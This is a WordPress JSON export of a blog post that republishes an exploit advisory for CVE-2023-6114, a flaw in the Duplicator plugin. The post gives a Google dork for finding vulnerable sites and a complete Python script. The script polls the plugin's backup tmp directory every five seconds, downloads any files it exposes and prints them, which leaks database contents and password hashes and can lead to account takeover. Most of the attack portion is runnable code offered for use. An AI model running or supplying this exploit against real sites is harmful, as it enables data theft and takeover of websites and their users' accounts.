{"id":55289,"date":"2024-03-11T18:59:50","date_gmt":"2024-03-11T15:59:50","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177521\/wpduplicator-takeover.txt"},"modified":"2024-03-12T11:01:59","modified_gmt":"2024-03-12T07:31:59","slug":"wordpress-duplicator-data-exposure-account-takeover","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-duplicator-data-exposure-account-takeover\/","title":{"rendered":"WordPress Duplicator Data Exposure \/ Account Takeover"},"content":{"rendered":"<p># Exploit Title: WordPress Plugin Duplicator &lt; 1.5.7.1 &#8211;<br \/>\nUnauthenticated Sensitive Data Exposure to Account Takeover<br \/>\n# Google Dork: inurl:(&#8220;plugins\/duplicator\/&#8221;)<br \/>\n# Date: 2023-12-04<br \/>\n# Exploit Author: Dmitrii Ignatyev<br \/>\n# Vendor Homepage:<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"RJXaEifPmF\"><p><a href=\"https:\/\/duplicator.com\/\" target=\"_blank\" rel=\"noopener\">Home Page<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Home Page&#8221; &#8212; Duplicator\" src=\"https:\/\/duplicator.com\/embed\/#?secret=FJOJQ56fPe#?secret=RJXaEifPmF\" data-secret=\"RJXaEifPmF\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><br \/>\n# Software Link: https:\/\/wordpress.org\/plugins\/duplicator\/<br \/>\n# Version: 1.5.7.1<br \/>\n# Tested on: Wordpress 6.4<br \/>\n# CVE : CVE-2023-6114# CVE-Link :<br \/>\nhttps:\/\/wpscan.com\/vulnerability\/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1\/<\/p>\n<p># CVE-Link : https:\/\/research.cleantalk.org\/cve-2023-6114-duplicator-poc-exploit\/A<br \/>\nsevere vulnerability has been discovered in the directory<br \/>\n*\/wordpress\/wp-content\/backups-dup-lite\/tmp\/*. This flaw not only<br \/>\nexposes extensive information about the site, including its<br \/>\nconfiguration, directories, and files, but more critically, it<br \/>\nprovides unauthorized access to sensitive data within the database and<br \/>\nall data inside. Exploiting this vulnerability poses an imminent<br \/>\nthreat, leading to potential *brute force attacks on password hashes<br \/>\nand, subsequently, the compromise of the entire system*.*<br \/>\nPOC*:<\/p>\n<p>1) It is necessary that either the administrator or auto-backup works<br \/>\nautomatically at the scheduled time<\/p>\n<p>2) Exploit will send file search requests every 5 seconds<\/p>\n<p>3) I attack the site with this vulnerability using an exploit<\/p>\n<p>Exploit sends a request to the server every 5 seconds along the path<br \/>\n\u201c*http:\/\/your_site\/wordpress\/wp-content\/backups-dup-lite\/tmp\/<br \/>\n&lt;http:\/\/your_site\/wordpress\/wp-content\/backups-dup-lite\/tmp\/&gt;\u201d* and if<br \/>\nit finds something in the index of, it instantly parses all the data<br \/>\nand displays it on the screen<\/p>\n<p>Exploit (python3):<\/p>\n<p>import requests<br \/>\nfrom bs4 import BeautifulSoup<br \/>\nimport re<br \/>\nimport time<\/p>\n<p>url = &#8220;http:\/\/127.0.0.1\/wordpress\/wp-content\/backups-dup-lite\/tmp\/&#8221;<br \/>\nprocessed_files = set()<\/p>\n<p>def get_file_names(url):<br \/>\nresponse = requests.get(url)<\/p>\n<p>if response.status_code == 200 and len(response.text) &gt; 0:<br \/>\nsoup = BeautifulSoup(response.text, &#8216;html.parser&#8217;)<br \/>\nlinks = soup.find_all(&#8216;a&#8217;)<\/p>\n<p>file_names = []\nfor link in links:<br \/>\nfile_name = link.get(&#8216;href&#8217;)<br \/>\nif file_name != &#8220;..\/&#8221; and not file_name.startswith(&#8220;?&#8221;):<br \/>\nfile_names.append(file_name)<\/p>\n<p>return file_names<br \/>\nreturn []\n<p>def get_file_content(url, file_name):<br \/>\nfile_url = url + file_name<\/p>\n<p>if re.search(r&#8217;\\.zip(?:\\.|$)&#8217;, file_name, re.IGNORECASE):<br \/>\nprint(f&#8221;Ignoring file: {file_name}&#8221;)<br \/>\nreturn None<\/p>\n<p>file_response = requests.get(file_url)<\/p>\n<p>if file_response.status_code == 200:<br \/>\nreturn file_response.text<br \/>\nreturn None<\/p>\n<p>while True:<br \/>\nfile_names = get_file_names(url)<\/p>\n<p>if file_names:<br \/>\nprint(&#8220;File names on the page:&#8221;)<br \/>\nfor file_name in file_names:<br \/>\nif file_name not in processed_files:<br \/>\nprint(file_name)<br \/>\nfile_content = get_file_content(url, file_name)<\/p>\n<p>if file_content is not None:<br \/>\nprint(&#8220;File content:&#8221;)<br \/>\nprint(file_content)<br \/>\nprocessed_files.add(file_name)<\/p>\n<p>time.sleep(5)<\/p>\n<p>&#8212;<br \/>\nWith best regards,<br \/>\nDmitrii Ignatyev, Penetration Tester<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Plugin Duplicator &lt; 1.5.7.1 &#8211; Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:(&#8220;plugins\/duplicator\/&#8221;) # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: Home Page # Software Link: https:\/\/wordpress.org\/plugins\/duplicator\/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https:\/\/wpscan.com\/vulnerability\/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1\/ # CVE-Link : &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55289","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55289"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289\/revisions"}],"predecessor-version":[{"id":55304,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289\/revisions\/55304"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}